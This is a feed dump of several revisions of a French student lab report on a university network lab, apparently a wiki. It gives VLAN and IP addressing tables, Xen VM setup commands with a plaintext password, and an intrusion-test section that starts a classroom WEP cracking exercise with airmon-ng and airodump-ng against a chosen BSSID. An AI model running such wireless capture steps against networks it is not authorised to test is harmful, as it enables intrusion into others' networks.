| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.41/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= 4. Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef012de1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Lancement de la capture des paquets :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlx40a5ef012de1&lt;br /&gt;
&lt;br /&gt;
BSSID choisi :&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09 =&amp;gt; kracotte10&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56193</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56193"/>
				<updated>2021-10-25T14:36:38Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 01 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.41/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
On :&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
On: &lt;br /&gt;
&lt;br /&gt;
xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= 4. Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef012de1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Lancement de la capture des paquets :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlx40a5ef012de1&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56191</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56191"/>
				<updated>2021-10-25T14:35:15Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 01 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.41/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
